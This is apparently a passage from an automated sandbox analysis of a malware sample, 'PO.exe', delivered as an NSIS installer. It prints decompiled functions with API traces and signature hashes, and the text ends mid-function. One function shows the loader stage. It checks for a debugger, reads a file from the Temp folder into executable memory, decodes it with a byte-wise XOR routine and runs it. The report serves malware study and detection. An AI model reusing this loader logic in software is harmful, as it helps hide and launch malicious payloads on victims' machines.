                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\PO.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-3018238072
                                            • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                            • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                            • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                            • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 73CA1000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74filememorystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E73CA1000() {
				char _v528;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t11;
				long _t19;
				WCHAR* _t20;
				void* _t21;
				DWORD* _t22;

				 *_t22 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t20 =  &_v528;
				_t5 = GetTempPathW(0x103, _t20);
				if(_t5 != 0) {
					lstrcatW(_t20, L"\\4hohyb48e3wlzft");
					_t5 = CreateFileW(_t20, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					if(_t5 != 0xffffffff) {
						_t21 = _t5;
						_t5 = GetFileSize(_t5, 0);
						if(_t5 != 0xffffffff) {
							_t19 = _t5;
							_t5 = VirtualAlloc(0, _t5, 0x3000, 0x40); // executed
							 *0x73ca3000 = _t5;
							if(_t5 != 0) {
								_t5 = ReadFile(_t21, _t5, _t19, _t22, 0); // executed
								if(_t5 != 0) {
									_t8 =  *0x73ca3000;
									if( *_t22 == 0) {
										L10:
										_t9 =  *_t8(); // executed
										return _t9;
									}
									_t11 = 0;
									do {
										asm("rol dh, 0x6");
										 *(_t8 + _t11) = ( !( *(_t8 + _t11)) + 0x00000014 ^ 0x00000070) + ( !( *(_t8 + _t11)) + 0x00000014 ^ 0x00000070) - 1;
										_t11 = _t11 + 1;
										_t8 =  *0x73ca3000;
									} while (_t11 <  *_t22);
									goto L10;
								}
							}
						}
					}
				}
				return _t5;
			}












                                            0x73ca1008
                                            0x73ca1017
                                            0x73ca1019
                                            0x73ca1019
                                            0x73ca101f
                                            0x73ca1029
                                            0x73ca1031
                                            0x73ca103d
                                            0x73ca1056
                                            0x73ca105f
                                            0x73ca1061
                                            0x73ca1066
                                            0x73ca106f
                                            0x73ca1071
                                            0x73ca107d
                                            0x73ca1085
                                            0x73ca108a
                                            0x73ca1094
                                            0x73ca109c
                                            0x73ca10a2
                                            0x73ca10a7
                                            0x73ca10cd
                                            0x73ca10cd
                                            0x00000000
                                            0x73ca10cd
                                            0x73ca10a9
                                            0x73ca10ad
                                            0x73ca10b2
                                            0x73ca10bf
                                            0x73ca10c2
                                            0x73ca10c3
                                            0x73ca10c8
                                            0x00000000
                                            0x73ca10ad
                                            0x73ca109c
                                            0x73ca108a
                                            0x73ca106f
                                            0x73ca105f
                                            0x73ca10d7

                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 73CA100F
                                            • DebugBreak.KERNEL32 ref: 73CA1019
                                            • GetTempPathW.KERNEL32(00000103,?), ref: 73CA1029
                                            • lstrcatW.KERNEL32(?,\4hohyb48e3wlzft), ref: 73CA103D
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 73CA1056
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 73CA1066
                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 73CA107D
                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 73CA1094
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.240850944.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                            • Associated: 00000000.00000002.240840404.0000000073CA0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.240861204.0000000073CA2000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.240875226.0000000073CA4000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                            • String ID: \4hohyb48e3wlzft
                                            • API String ID: 4020703165-1409386307
                                            • Opcode ID: ecd1c02035486298a80691b23f971d0857eb6cdaa2c1153115042850dcac0352
                                            • Instruction ID: 9824780314c262f8b5c97a1479a1496092f08c66bb50fff3a03fa653df231e69
                                            • Opcode Fuzzy Hash: ecd1c02035486298a80691b23f971d0857eb6cdaa2c1153115042850dcac0352
                                            • Instruction Fuzzy Hash: 6F21A5312002996FF3107A768C09F663AAAEF41721F20021CF99FEF0C1DB656941DB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x7a3030 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D62(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000);
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
				return 0;
			}










                                            0x00401fdc
                                            0x00401fe4
                                            0x00401fe7
                                            0x00401ff3
                                            0x00402093
                                            0x00000000
                                            0x00401ff9
                                            0x00402001
                                            0x0040200b
                                            0x0040200e
                                            0x0040201d
                                            0x0040201e
                                            0x00402024
                                            0x00402028
                                            0x0040208f
                                            0x00402095
                                            0x00402095
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402010
                                            0x00402011
                                            0x00402017
                                            0x0040201b
                                            0x0040202a
                                            0x00402034
                                            0x00402038
                                            0x0040207c
                                            0x0040203a
                                            0x0040203d
                                            0x00402040
                                            0x00402070
                                            0x00402042
                                            0x00402045
                                            0x0040204e
                                            0x00402050
                                            0x00402050
                                            0x0040204e
                                            0x00402040
                                            0x00402084
                                            0x00402087
                                            0x00402087
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040201b
                                            0x0040200e
                                            0x0040209b
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                            • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                            • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                            • SetErrorMode.KERNEL32 ref: 0040209B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 1609199483-0
                                            • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                            • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                            • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                            • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405C94(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x7a15d0;
			}





                                            0x00405ca2
                                            0x00405cae
                                            0x00405cb6
                                            0x00405cb8
                                            0x00405cbd
                                            0x00000000
                                            0x00405cca
                                            0x00405cc0
                                            0x00000000

                                            APIs
                                            • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PO.exe" ), ref: 00405CA2
                                            • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                            • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                            • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorFindMode$CloseFileFirst
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2885216544-823278215
                                            • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                            • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                            • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                            • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x7a2f88;
				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x79f580;
					"1033" = 0x7830;
					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
					__eflags =  *0x79f580;
					if(__eflags == 0) {
						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
					}
					lstrcatA("1033", _t78);
				} else {
					E0040591D("1033",  *_t20() & 0x0000ffff);
				}
				E004037F2(_t75, _t88);
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
				if(E004055AC(_t88, _t84) != 0) {
					L16:
					if(E004055AC(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059E1(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2768 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037F2(_t75, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t31 = E00404E34(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x7a274c;
								if( *0x7a274c == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f560, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x7a2720);
								 *0x7a2744 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x7a2720);
							}
							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x7a2f80;
						 *0x7a2734 = _t28;
						_v20 = 0x624e5f;
						 *0x7a2724 = E00401000;
						 *0x7a2730 =  *0x7a2f80;
						 *0x7a2744 =  &_v20;
						if(RegisterClassA(0x7a2720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x7a1f20;
					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
					_t61 =  *0x7a1f20; // 0x49
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x7a1f21;
						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059BF(_t84, E004054CC(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405513(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}



























                                            0x0040352c
                                            0x0040353d
                                            0x00403544
                                            0x00403546
                                            0x0040355a
                                            0x0040355f
                                            0x00403575
                                            0x0040357a
                                            0x00403580
                                            0x00403592
                                            0x00403592
                                            0x0040359d
                                            0x00403548
                                            0x00403553
                                            0x00403553
                                            0x004035a2
                                            0x004035ac
                                            0x004035b5
                                            0x004035c1
                                            0x00403647
                                            0x0040364f
                                            0x00403651
                                            0x00403657
                                            0x00403658
                                            0x00403658
                                            0x0040366e
                                            0x00403674
                                            0x00403682
                                            0x00403711
                                            0x00403719
                                            0x00403723
                                            0x00403728
                                            0x0040372e
                                            0x004037c0
                                            0x004037c5
                                            0x004037c7
                                            0x004037e3
                                            0x00000000
                                            0x004037e3
                                            0x004037c9
                                            0x004037cf
                                            0x004037d7
                                            0x004037d7
                                            0x00000000
                                            0x004037cf
                                            0x0040373c
                                            0x00403748
                                            0x0040374e
                                            0x00403750
                                            0x00403752
                                            0x00403755
                                            0x0040375e
                                            0x0040375e
                                            0x00403766
                                            0x0040376e
                                            0x00403770
                                            0x00403772
                                            0x00403777
                                            0x0040377d
                                            0x00403780
                                            0x00403786
                                            0x0040378d
                                            0x0040378d
                                            0x004037ac
                                            0x004037b6
                                            0x00000000
                                            0x004037bb
                                            0x0040371b
                                            0x0040371d
                                            0x00000000
                                            0x00403688
                                            0x00403688
                                            0x0040368e
                                            0x00403698
                                            0x004036a0
                                            0x004036aa
                                            0x004036b0
                                            0x004036be
                                            0x004037e8
                                            0x004037e8
                                            0x00000000
                                            0x004037e8
                                            0x004036c4
                                            0x004036cd
                                            0x0040370c
                                            0x00000000
                                            0x0040370c
                                            0x004035c7
                                            0x004035c7
                                            0x004035cc
                                            0x00000000
                                            0x00000000
                                            0x004035d6
                                            0x004035e5
                                            0x004035ea
                                            0x004035f1
                                            0x00000000
                                            0x00000000
                                            0x004035f5
                                            0x004035f7
                                            0x00403604
                                            0x00403604
                                            0x0040360c
                                            0x00403612
                                            0x0040363a
                                            0x00403642
                                            0x00000000
                                            0x00403624
                                            0x00403625
                                            0x0040362e
                                            0x00403634
                                            0x00403635
                                            0x00000000
                                            0x00403635
                                            0x00403630
                                            0x00403632
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403632
                                            0x00403612

                                            APIs
                                              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                            • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\PO.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                            • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 00403607
                                            • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                            • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                            • LoadImageA.USER32 ref: 0040366E
                                            • RegisterClassA.USER32 ref: 004036B5
                                              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                            • CreateWindowExA.USER32 ref: 00403706
                                            • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                            • GetClassInfoA.USER32 ref: 0040376E
                                            • GetClassInfoA.USER32 ref: 0040377D
                                            • RegisterClassA.USER32 ref: 0040378D
                                            • DialogBoxParamA.USER32 ref: 004037AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: 'z$"C:\Users\user\Desktop\PO.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                            • API String ID: 914957316-3552346376
                                            • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                            • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                            • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                            • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 81%
                                            			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				signed int _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				signed int _t73;
				signed int _t78;
				signed int _t79;
				long _t84;
				intOrPtr _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\alfons\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\alfons\\Desktop", 0x400);
				_t91 = E00405690(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405513(_t100);
				_t56 = GetFileSize(_t91, 0);
				__eflags = _t56;
				 *0x79d938 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					__eflags =  *0x7a2f8c;
					if( *0x7a2f8c == 0) {
						goto L33;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E004030FF( *0x7a2f8c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff);
						_t62 = E00402EBD();
						__eflags = _t62 - _v28;
						if(_t62 == _v28) {
							__eflags = _a4 & 0x00000002;
							 *0x7a2f88 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
								__eflags =  *_t102;
							}
							__eflags = _v48 & 0x00000001;
							 *0x7a3020 =  *_t102 & 0x00000018;
							 *0x7a2f90 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x7a2f94 =  *0x7a2f94 + 1;
								__eflags =  *0x7a2f94;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
								__eflags = _t93;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E00405670(0x7a2fa0, _t102 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E004030FF( *0x789930);
					_t73 = E004030CD( &_v12, 4); // executed
					__eflags = _t73;
					if(_t73 == 0) {
						goto L33;
					}
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						goto L33;
					}
					goto L31;
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
						__eflags = _t101 - _t78;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030CD(0x795938, _t92); // executed
						__eflags = _t79;
						if(_t79 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x7a2f8c;
						if( *0x7a2f8c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t84 = GetTickCount();
									__eflags = _t84 - _t97;
									if(_t84 > _t97) {
										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405CFC(0);
								}
							}
							goto L22;
						}
						E00405670( &_v48, 0x795938, 0x1c);
						_t94 = _v48;
						__eflags = _t94 & 0xfffffff0;
						if((_t94 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
